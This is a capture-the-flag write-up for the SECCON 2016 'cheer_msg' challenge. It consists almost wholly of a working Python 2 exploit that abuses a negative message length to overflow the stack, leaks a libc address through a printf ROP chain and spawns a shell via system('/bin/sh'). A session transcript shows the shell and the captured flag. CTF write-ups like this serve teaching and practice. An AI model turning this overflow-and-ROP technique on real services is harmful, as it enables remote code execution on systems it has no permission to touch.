[exploit] 2016 SecconCTF - cheer_msg writeups (exploit only)
by blackcon
2016. 12. 11.
#!/usr/bin/env python
import socket
import struct
import telnetlib
p = lambda x: struct.pack( "<I", x )        # int -> 4 little-endian bytes (32-bit target)
up = lambda x: struct.unpack( "<I", x )[0]  # 4 bytes -> int; raises struct.error unless len(x) == 4
host = "localhost"                 # dead assignment, overwritten on the next line (left over from local testing)
host = "cheermsg.pwn.seccon.jp"    # the 2016 event's challenge host as given in the write-up
port = 30527
# Module-level side effect: the TCP connection is opened as soon as the script runs,
# before any function below is defined or called.
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.connect( ( host, port ) )
# All 0x0804xxxx values are absolute addresses inside the target binary, i.e. the binary
# is assumed to load at a fixed base (no PIE). A position-independent build would
# invalidate every one of them -- that is the mitigation this whole script depends on
# being absent.
pppr = 0x80487ad        # gadget the author labels "pppr"; used in stage 1 as printf's return target
setbuf_got = 0x804A00c  # GOT slot of setbuf: holds a libc pointer once the symbol is resolved
printf_plt = 0x8048430  # PLT stub of printf
def u_recv( st ):
    """Read from the module-level socket ``s`` until the marker ``st`` has been seen.

    Returns everything received up to and including the marker.  Bytes are
    read one at a time, presumably so nothing past the marker is consumed.

    Failure mode: if the peer closes the connection, ``recv`` returns ``''``,
    ``bf`` stops growing and the loop never terminates -- there is no timeout
    and no end-of-stream check.  Also, ``st not in bf`` rescans the whole
    buffer on every byte, so long reads are quadratic.
    """
    bf = ''
    while st not in bf:
        bf += s.recv( 1 )
    return bf
## stage 1 ##
# Goal of this stage: obtain one libc address from the process so that the
# libc-relative offsets at the bottom can be rebased (libc is treated as randomized,
# the binary as fixed).
u_recv( "Message Length >>" )
s.send( "-150\n" )   # a negative length; the rest of the stage relies on the service accepting it
u_recv( "Message >>" )
# The "message" is a sequence of packed addresses.  From the layout it reads as a
# call chain -- printf(fmt, setbuf_got, setbuf_got), then continue at main -- which
# presumes the message lands over saved control data on the stack; that part is
# not verifiable from this script alone.  The upstream defect is the length check
# that lets a negative value through; rejecting it would remove the overflow.
pay = p( printf_plt )
pay += p( pppr )        # return target after printf; skips the three argument slots below
pay += p( 0x804887d ) # \nThank you %s!\nMessage : %s\n
pay += p( setbuf_got )  # first %s: prints the bytes stored at the GOT slot (the libc pointer)
pay += p( setbuf_got )  # second %s: same slot, fills the second placeholder
pay += p( 0x80485ca ) # main
s.send( pay+"\n" )
# Two reads of the same marker: the first chunk is presumably the program's own
# "Thank you/Message" output; the second is produced by the injected printf and is
# the one whose "Thank you <bytes>!" carries the GOT contents.  Only the second is kept.
data = u_recv( "Message : " )
data = u_recv( "Message : " )
data = data.split( "Thank you " )[1]
leak = data.split( "!\n" )[0]
leak = up( leak[:4] )   # %s stops at the first NUL byte, so up() raises unless at least 4 bytes came back
# The three offsets are specific to the libc build the challenge shipped with; on any
# other libc they are simply wrong, which is why the stage needs a live leak at all.
libc_base = leak - 0x00067b20 # setbuf offset: 0x67b20
system = libc_base + 0x00040310 # system offset: 0x40310
binsh = libc_base + 0x16084c # binsh offset: 0x16084c
## stage 2 ##
# Same negative-length message as stage 1 (the stage-1 chain ended by continuing at
# main, so the prompt sequence repeats), now with the rebased libc addresses.
u_recv( "Message Length >>" )
s.send( "-150\n" )
u_recv( "Message >>" )
pay = p( system )
pay += p( 0x41414141 )   # placeholder slot in the return-address position; presumably never returned to
pay += p( binsh )        # argument slot: address computed from the "binsh offset" above
s.send( pay+"\n" )
print '#####'   # print *statement*: this script is Python 2 only (str-based sockets, too)
# Hand the still-open socket to telnetlib so the rest of the session is interactive.
t = telnetlib.Telnet()
t.sock = s
t.interact()
# Author's session transcript, kept verbatim.  It is a bare string-literal expression
# statement, so it has no runtime effect; the garbled characters are the raw leaked
# bytes echoed back by the service.
'''
blackcon@bk{~/seccon/exploit/cheer_msg}:./pay.py
#####
Oops! I forgot to ask your name...
Can you tell me your name?
Name >>
Thank you sY�AAAALxk�!
Message :
id
uid=10792 gid=1001(cheer_msg) groups=1001(cheer_msg)
ls
cheer_msg
flag.txt
run.sh
cat flag.txt
SECCON{N40.T_15_ju571c3}
'''